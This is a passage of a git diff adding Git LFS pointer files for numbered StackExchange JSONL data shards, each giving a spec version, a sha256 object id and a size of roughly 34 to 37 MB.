@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c33382e7b47657c2426babe37af860a3608c1e82c3faa6ee604282aeeb18ea06 +size 36599181 diff --git a/data/stackexchange/1-1/1556_2289.jsonl b/data/stackexchange/1-1/1556_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fdd2daf6b17547684d2822cc23bca7f833451ac --- /dev/null +++ b/data/stackexchange/1-1/1556_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9827bad65f42c93267ae70aac17d09262d745976f99d282fc528ae0c2bdbf0c0 +size 37177700 diff --git a/data/stackexchange/1-1/1557_2289.jsonl b/data/stackexchange/1-1/1557_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a21ab243d9e7ea765aba6a0c92779cfccf38d6b --- /dev/null +++ b/data/stackexchange/1-1/1557_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1383d1b4669d7c2c4307768b5654829a3ea5313808b081727241fe4636919c4 +size 37401806 diff --git a/data/stackexchange/1-1/1558_2289.jsonl b/data/stackexchange/1-1/1558_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d4885c0a445ba52a8c6b8c586baf00985c3a267 --- /dev/null +++ b/data/stackexchange/1-1/1558_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a1f6ce7fff28dc0881c185016fbe6024c27b07d9d33b246bc6c57fc101e01a8 +size 37357085 diff --git a/data/stackexchange/1-1/1559_2289.jsonl b/data/stackexchange/1-1/1559_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..b60055981d7ccb54733017913172afcb2606132e --- /dev/null +++ b/data/stackexchange/1-1/1559_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89b8e2a4f73b9a91716cd5301d1bbadeda1f656119a33c4a532d5aeb1cedadf5 +size 36649577 diff --git a/data/stackexchange/1-1/155_2289.jsonl b/data/stackexchange/1-1/155_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82db2c505c479d013e0b6e0b8db2335891f3f84b --- /dev/null +++ b/data/stackexchange/1-1/155_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9bbdf7fd9d9c90dbbea00874886bc5f7cfd255d703a842e4611a5aeec425ef3 +size 34615685 diff --git a/data/stackexchange/1-1/1560_2289.jsonl b/data/stackexchange/1-1/1560_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78fbdcc3c10d60f181925667dd6e2c3cddb11507 --- /dev/null +++ b/data/stackexchange/1-1/1560_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:370054f853a722ae46a35b9020f7ef6e7700478863be2f7093e0848dc6fa4738 +size 37073803 diff --git a/data/stackexchange/1-1/1561_2289.jsonl b/data/stackexchange/1-1/1561_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ccb7cd6781bf7d90faa1587bcea14ad50bcf2855 --- /dev/null +++ b/data/stackexchange/1-1/1561_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:20173661f1b2ee8c36985609c272f1790c2073a5c965fdd160fe9d21701a6ba7 +size 37020762 diff --git a/data/stackexchange/1-1/1562_2289.jsonl b/data/stackexchange/1-1/1562_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76e2efe2c4d28e6fa37d75d8354a6ba2c67cc20c --- /dev/null +++ b/data/stackexchange/1-1/1562_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d3a8690d897b42111ff02df28576cfaa65f343341ee598e2071d83027f2fb57 +size 36426851 diff --git a/data/stackexchange/1-1/1563_2289.jsonl b/data/stackexchange/1-1/1563_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..823304f512c77baf0286eac9e118eba6867c0e95 --- /dev/null +++ b/data/stackexchange/1-1/1563_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d008075549c3f36c9ff223224d2eea1f641f5ecaf6815c7e3a01c6a21fd2d34c +size 36974329 diff --git a/data/stackexchange/1-1/1564_2289.jsonl b/data/stackexchange/1-1/1564_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..629c2d52edda04c64938bf1f094d4cb7a81a0769 --- /dev/null +++ b/data/stackexchange/1-1/1564_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a97c168058141b3e8c4fb175da43d548ce31e0bcee80cbfee3f2c3cdf632381a +size 36948778 diff --git a/data/stackexchange/1-1/1565_2289.jsonl b/data/stackexchange/1-1/1565_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba760656f8fe6681126c9ba5ba7452b48da4c297 --- /dev/null +++ b/data/stackexchange/1-1/1565_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2055474514ccf517a5ba075cdd8ead62bb6852984ce790d128c25f05ae7000e0 +size 36839994 diff --git a/data/stackexchange/1-1/1566_2289.jsonl b/data/stackexchange/1-1/1566_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..adbc6481497e4ec90a7f98f1668bcb62bda7a1b6 --- /dev/null +++ b/data/stackexchange/1-1/1566_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:473739ec07ee8544955dbef8898f406cc8ba4710e776def7e34861de1131c0df +size 35888577 diff --git a/data/stackexchange/1-1/1567_2289.jsonl b/data/stackexchange/1-1/1567_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cc2c5a21fd45fa6a9e3c97cf6f67920414a6fe2f --- /dev/null +++ b/data/stackexchange/1-1/1567_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2172ea15a0e03c02263d30235d91dd8e4779e95f85a6cf232e43fe4dcbeab85 +size 37333698 diff --git a/data/stackexchange/1-1/1568_2289.jsonl b/data/stackexchange/1-1/1568_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ef6733879be1302ebbc41bea2c9c7970200ab53 --- /dev/null +++ b/data/stackexchange/1-1/1568_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ccf749fbb075f2505b93527b3d8afba447512789863f8a2b3a4a1bdbe96e4f7 +size 36558439 diff --git a/data/stackexchange/1-1/1569_2289.jsonl b/data/stackexchange/1-1/1569_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb5004a5fd13d4ab89d0e9b8eba1f8bfb379b011 --- /dev/null +++ b/data/stackexchange/1-1/1569_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2133358220753f8d86f3c0b72ddf9c5e506610203c1673a8103b03e760acd6a5 +size 36167235 diff --git a/data/stackexchange/1-1/156_2289.jsonl b/data/stackexchange/1-1/156_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..66e07174ef1e63e02dc6fd5e762f163add72e2b5 --- /dev/null +++ b/data/stackexchange/1-1/156_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42a598e0136acb0b875a75624389332ab971f9dc8850e9825316814db04deabf +size 34674997 diff --git a/data/stackexchange/1-1/1570_2289.jsonl b/data/stackexchange/1-1/1570_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..494a4f16e1ad51d679999918acf83e489f24bd5f --- /dev/null +++ b/data/stackexchange/1-1/1570_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fea679e016d431c8481975d0a208b77dab84a64c103c28f514021a54fa991a8 +size 36635256 diff --git a/data/stackexchange/1-1/1571_2289.jsonl b/data/stackexchange/1-1/1571_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e5306a8384a8fc5b626d657daddbdbdfa35643c --- /dev/null +++ b/data/stackexchange/1-1/1571_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bb1dacaa8e3934132e6f543717004299e827d2b52447c4fa81e75b06166ff0b +size 37204033 diff --git a/data/stackexchange/1-1/1572_2289.jsonl b/data/stackexchange/1-1/1572_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7fad082de26ac339211c165109ed2b6e6385d83b --- /dev/null +++ b/data/stackexchange/1-1/1572_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a276f65960203f6ff59179ad94183eb1110ff0aaac52bbc64afbc190c6bfc752 +size 36787260 diff --git a/data/stackexchange/1-1/1573_2289.jsonl b/data/stackexchange/1-1/1573_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0cd652bcf300fab58f0ae2a49f245093f974ed19 --- /dev/null +++ b/data/stackexchange/1-1/1573_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f68013a94afa4313002798e15e9b2c93a18c4c590906c03cc486b4972d9fa22 +size 36784987 diff --git a/data/stackexchange/1-1/1574_2289.jsonl b/data/stackexchange/1-1/1574_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..813e98e106624177ff9573e5e4b7bc5ad3b7c774 --- /dev/null +++ b/data/stackexchange/1-1/1574_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5438597a48a0e636197d2cec7f718259fed672bb0e8aa36e43991ec0635f0831 +size 37170712 diff --git a/data/stackexchange/1-1/1575_2289.jsonl b/data/stackexchange/1-1/1575_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b239191df331db08d6ffc94ceaaf54d3f03eba5 --- /dev/null +++ b/data/stackexchange/1-1/1575_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5741269223549d4aa3f01fec916119a990463061de68bc01dd55117a267f3720 +size 36976671 diff --git a/data/stackexchange/1-1/1576_2289.jsonl b/data/stackexchange/1-1/1576_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6449b37668802091982e9220c8cd4cf3a018cc4d --- /dev/null +++ b/data/stackexchange/1-1/1576_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38bbdbed8e50052ea9b0f8952bd2e9372e17faeee4db6739ab743ff416b5b535 +size 36536677 diff --git a/data/stackexchange/1-1/1577_2289.jsonl b/data/stackexchange/1-1/1577_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf13d5d574e96c9f92b0a019a1ca206bbcae7195 --- /dev/null +++ b/data/stackexchange/1-1/1577_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:114a4a93e72122e5e7e5be53a65fdcc1a746ba1e197f6bd9dac36fc3f60f349e +size 36364041 diff --git a/data/stackexchange/1-1/1578_2289.jsonl b/data/stackexchange/1-1/1578_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec47e6c1a2f81b24a7badffc46d8c6d8112ef94c --- /dev/null +++ b/data/stackexchange/1-1/1578_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b11e4daf20372d4c8c0bf94acf2be6dfd88cce4c10cb338f354e403297dd292d +size 37214153 diff --git a/data/stackexchange/1-1/1579_2289.jsonl b/data/stackexchange/1-1/1579_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bfbd8ac456ab1e0b93b626942e617a8cb9fa47e0 --- /dev/null +++ b/data/stackexchange/1-1/1579_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a351f8d558bc4924dfe2df46aee0d58ade6576515b51822203272acef7ad80fc +size 36796492 diff --git a/data/stackexchange/1-1/157_2289.jsonl b/data/stackexchange/1-1/157_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..77f587f1d91d9e9c7dda9c7ca1e337af3f7bbb80 --- /dev/null +++ b/data/stackexchange/1-1/157_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ad9f149baa3ba39bcc9928cf60081dcef2ed7c13c9c132f3eff651dc3b566ef +size 34903186 diff --git a/data/stackexchange/1-1/1580_2289.jsonl b/data/stackexchange/1-1/1580_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb25856c59ee78c2d95411b4dcdc87f1ead78048 --- /dev/null +++ b/data/stackexchange/1-1/1580_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa01c6435e68e760ff4ed2157096d17d315ab8d6a10dda4a85529037252b9b90 +size 36678605 diff --git a/data/stackexchange/1-1/1581_2289.jsonl b/data/stackexchange/1-1/1581_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d13a5b97c4113e19ca555714fc754a3a1e19c49 --- /dev/null +++ b/data/stackexchange/1-1/1581_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:c2445dc1e6eae0a210dc39cd2cf27f4f1e2c8ff2583de0b2a991fcfab68b52f8 +size 37418809 diff --git a/data/stackexchange/1-1/1582_2289.jsonl b/data/stackexchange/1-1/1582_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25ee37bf403e7bb85e525480e486276010d92754 --- /dev/null +++ b/data/stackexchange/1-1/1582_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ddedf11430d8a9a278abc00ce96c6dc4a81a6637fe20ea93bf6ab20c6aa2b91 +size 36834460 diff --git a/data/stackexchange/1-1/1583_2289.jsonl b/data/stackexchange/1-1/1583_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76d8c8e1b65bae4a2722a77702e06d0fcf2d8e7d --- /dev/null +++ b/data/stackexchange/1-1/1583_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c9a7f2de98041b2390ab92a21aa2e071aad7f09771319055f904f2493dce73f +size 37584977 diff --git a/data/stackexchange/1-1/1584_2289.jsonl b/data/stackexchange/1-1/1584_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a676156d56ef29258e3b8448c20f4c05f00ada4f --- /dev/null +++ b/data/stackexchange/1-1/1584_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13893315d9c8936b0816ae0317424657389d3220b166cb6a0c8d1cddb2b5172b +size 36405049 diff --git a/data/stackexchange/1-1/1585_2289.jsonl b/data/stackexchange/1-1/1585_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75a49299fc8b7005c6308ebcf2225eb825819810 --- /dev/null +++ b/data/stackexchange/1-1/1585_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38cd6d81caa86cc2fd7b45cd92f1fc80c62b1206947c09a2c8a60b039a840089 +size 36482800 diff --git a/data/stackexchange/1-1/1586_2289.jsonl b/data/stackexchange/1-1/1586_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50ff9dbc373e5638a36d79832b218bf3ffb312bf --- /dev/null +++ b/data/stackexchange/1-1/1586_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e720782094778bcc3c4cd7e7c2164eecccc28cc2fcd0d5c6d600193cf974e38 +size 37074537 diff --git a/data/stackexchange/1-1/1587_2289.jsonl b/data/stackexchange/1-1/1587_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a9eeec641a018148f20a0b73596c25a578e001c --- /dev/null +++ b/data/stackexchange/1-1/1587_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdba099e5b97a677b5466471965862da7ae096f2e1f8e2ce22703cb97daa4eae +size 36949135 diff --git a/data/stackexchange/1-1/1588_2289.jsonl b/data/stackexchange/1-1/1588_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13d9b2dc346b214c21b3964505542256acad1c1b --- /dev/null +++ b/data/stackexchange/1-1/1588_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a33cd4214fc7204fbd5cf8a3f6b579c8829632958c99ab07dcfe234b5a717fd9 +size 37001266 diff --git a/data/stackexchange/1-1/1589_2289.jsonl b/data/stackexchange/1-1/1589_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6915d6568ca0de51b35126818e86040aff61baac --- /dev/null +++ b/data/stackexchange/1-1/1589_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f77a969e5d09262dfd527872b89b820196356cdc556bfb656862b022bac54d5a +size 34791116 diff --git a/data/stackexchange/1-1/158_2289.jsonl b/data/stackexchange/1-1/158_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..d42791811f5234d33c5918ddafd37b867ecff1d8 --- /dev/null +++ b/data/stackexchange/1-1/158_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:469b907eb80239c648308f2dbdc5760d30c4f566a3217f0365aa01ced3aaf3d6 +size 34771851 diff --git a/data/stackexchange/1-1/1590_2289.jsonl b/data/stackexchange/1-1/1590_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ffb7bf0e9d4e25cdfceb9a8d651bb0f34e1cc07 --- /dev/null +++ b/data/stackexchange/1-1/1590_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b5e9f67806e859912b575753a4f8ef4b6c814508dbfd883d6473fd0c5560024 +size 34361306 diff --git a/data/stackexchange/1-1/1591_2289.jsonl b/data/stackexchange/1-1/1591_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..245b795dfc95b289f6a6950861836a3d9e99f8c5 --- /dev/null +++ b/data/stackexchange/1-1/1591_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67878b7c0ab158ea7e71d81dda9bdeb876ae85649e2495ffd56e97b3553448ad +size 34559306 diff --git a/data/stackexchange/1-1/1592_2289.jsonl b/data/stackexchange/1-1/1592_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d3248a516b70ba5a580af16f7e543edf257932e --- /dev/null +++ b/data/stackexchange/1-1/1592_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e56f4179383edfddcfbe5df7e5943948988ad94769500dc53e840d86d7bda386 +size 34750243 diff --git a/data/stackexchange/1-1/1593_2289.jsonl b/data/stackexchange/1-1/1593_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1eefabb1fcc4e817479b002f3cc7a64dd4e37fcd --- /dev/null +++ b/data/stackexchange/1-1/1593_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f63e4ac59f1097ff241f7a57ce7ee860b56ee2b9272adbb231e5587a6f0f46d0 +size 34189608 diff --git a/data/stackexchange/1-1/1594_2289.jsonl b/data/stackexchange/1-1/1594_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c92f263d3c9ff6f83729ee1817f090d96232513 --- /dev/null +++ b/data/stackexchange/1-1/1594_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:089a4bbfe2a9f54db1d9761d2aa0bf6c9ef543829440fdb09cc93015b19e49d9 +size 34908086 diff --git a/data/stackexchange/1-1/1595_2289.jsonl b/data/stackexchange/1-1/1595_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b42aeebdef7be0786ef71c9b41eba8bcbfb8202c --- /dev/null +++ b/data/stackexchange/1-1/1595_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d938d91511eb5ad2657cfcb7b55dd6dbd393fd41f67f2e85fe66d5937e97210 +size 34417570 diff --git a/data/stackexchange/1-1/1596_2289.jsonl b/data/stackexchange/1-1/1596_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ab91a55b858fbc621c1da4ec194703492c791d6 --- /dev/null +++ b/data/stackexchange/1-1/1596_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:272e39fbe0a4b2c3719b485a20c4598d83f3a09c50763224643dab26fb00c657 +size 34896312 diff --git a/data/stackexchange/1-1/1597_2289.jsonl b/data/stackexchange/1-1/1597_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf705cc17c74dcc745dcaf6a86bf1c54d7107f4b --- /dev/null +++ b/data/stackexchange/1-1/1597_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:673e85037f6ee5706ebeffe65f036ba90d672f8d322ca24865c6f33000b9e600 +size 34592190 diff --git a/data/stackexchange/1-1/1598_2289.jsonl b/data/stackexchange/1-1/1598_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee1086817640eeb50e79f79d944b649bad9d84ea --- /dev/null +++ b/data/stackexchange/1-1/1598_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c045f300b1d8430c1afcb81bde7b381677820412724b08385fb8985f5789047 +size 34053791 diff --git a/data/stackexchange/1-1/1599_2289.jsonl b/data/stackexchange/1-1/1599_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a5541da152c9962e63176b1cbfaac42ead615fd --- /dev/null +++ b/data/stackexchange/1-1/1599_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4654df641f357c0f11b01be77a939aed675b7c1dbb8c97536b36f2a659d5df4e +size 34096911 diff --git a/data/stackexchange/1-1/159_2289.jsonl b/data/stackexchange/1-1/159_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0bd0689af59a792438d2dcfa203c88157d95720 --- /dev/null +++ b/data/stackexchange/1-1/159_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b49ac31b51a84fd8e91e89ce7f9558e2dee490778027d2d75b91aabf3f2733b +size 34455718 diff --git a/data/stackexchange/1-1/15_2289.jsonl b/data/stackexchange/1-1/15_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fa40ec6393cdbd02cb82ec8072296b05d0187fd --- /dev/null +++ b/data/stackexchange/1-1/15_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d062a554f7a00a44fa7f59834ba85fc3fc180052c3aa03e0220c48b484fc2cb8 +size 35966710 diff --git a/data/stackexchange/1-1/1600_2289.jsonl b/data/stackexchange/1-1/1600_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b0767d3373c831094523640333c318dde3acdd5 --- /dev/null +++ b/data/stackexchange/1-1/1600_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f7fd99bb39799a9c0cf4b8adf12ab53ba1fca53b5bb9e187c3d3767da5769f6a +size 34295670 diff --git a/data/stackexchange/1-1/1601_2289.jsonl b/data/stackexchange/1-1/1601_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a319f779094f2d49d032f0327c90a04c9b9642eb --- /dev/null +++ b/data/stackexchange/1-1/1601_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8419431d80737122351cb114fae2d2b1030782cca8639ce6156a35551059fc2 +size 34560284 diff --git a/data/stackexchange/1-1/1602_2289.jsonl b/data/stackexchange/1-1/1602_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7e0e8e24bfbbdc3a1d5c66f16c1b10d19ada6de --- /dev/null +++ b/data/stackexchange/1-1/1602_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdcd1f7f2fb5b6e96047a9269c7794958047a6fe7dc36933e873aa1770dcfb3f +size 34553178 diff --git a/data/stackexchange/1-1/1603_2289.jsonl b/data/stackexchange/1-1/1603_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f874b8748eda4aa8f4e3b79a3c76f4f27343434f --- /dev/null +++ b/data/stackexchange/1-1/1603_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42d198627117e776dd63bf3c8445d4b65429264748d6c30d92cc4d933cbc95d2 +size 34773197 diff --git a/data/stackexchange/1-1/1604_2289.jsonl b/data/stackexchange/1-1/1604_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..0a39f2e534695f64665b06f310778fbb9f272126 --- /dev/null +++ b/data/stackexchange/1-1/1604_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c0577a0306314443275d70bc51895457096d5c2190943000149e25a8e4ced9f +size 34421995 diff --git a/data/stackexchange/1-1/1605_2289.jsonl b/data/stackexchange/1-1/1605_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c756929b07f88cbce0ec64a3f6af71e303cb811 --- /dev/null +++ b/data/stackexchange/1-1/1605_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd366f0038fae6bee5bbe308df69ebf60377ce850f612ee67a75679815e3fd3e +size 34559270 diff --git a/data/stackexchange/1-1/1606_2289.jsonl b/data/stackexchange/1-1/1606_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed6c44f24df218cbcfd68a4328046a9ca637cbdf --- /dev/null +++ b/data/stackexchange/1-1/1606_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da28252ebb4d750f138860fad98f5ab231daa45e21e9029b7fa3dca372d8f0f5 +size 34921496 diff --git a/data/stackexchange/1-1/1607_2289.jsonl b/data/stackexchange/1-1/1607_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae24612a4cccd507e393d91f11979e70e2ed4a4e --- /dev/null +++ b/data/stackexchange/1-1/1607_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:121ac1f32bc8a089bca0dcd0f6b204be613b058671d2d9f1272088de2f8ae6a5 +size 34852742 diff --git a/data/stackexchange/1-1/1608_2289.jsonl b/data/stackexchange/1-1/1608_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..535dd51aadb0709817e3caf480103639018c0f4e --- /dev/null +++ b/data/stackexchange/1-1/1608_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90ee486baf9b140727cf365d7939a9e1566b3f4be0b135616d4cadb96419bc9c +size 34410418 diff --git a/data/stackexchange/1-1/1609_2289.jsonl b/data/stackexchange/1-1/1609_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c053c7c49b4a20f918093f364006e4d6d183ba2 --- /dev/null +++ b/data/stackexchange/1-1/1609_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac1aa3d61f2f34cced7916265e24f56b5d123fe83247a59db3d5353280f1d604 +size 34155638 diff --git a/data/stackexchange/1-1/160_2289.jsonl b/data/stackexchange/1-1/160_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a518bdd09cda867cd78659043bfba6401099f69 --- /dev/null +++ b/data/stackexchange/1-1/160_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95cb82b44ac6aa1e2f2b0197e77d627b1acb78b826216c39ce7a9e566acad380 +size 34764207 diff --git a/data/stackexchange/1-1/1610_2289.jsonl b/data/stackexchange/1-1/1610_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ccee47e131dd872d30512358d13afe4e9c79a06f --- /dev/null +++ b/data/stackexchange/1-1/1610_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:350e3592dcbe91a21e2e6b95b3beefcfaeae900b84d01415635b83457523d3e2 +size 34487598 diff --git a/data/stackexchange/1-1/1611_2289.jsonl b/data/stackexchange/1-1/1611_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1ed0e1386de1e02586ab5786a2d6365b9c98024 --- /dev/null +++ b/data/stackexchange/1-1/1611_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
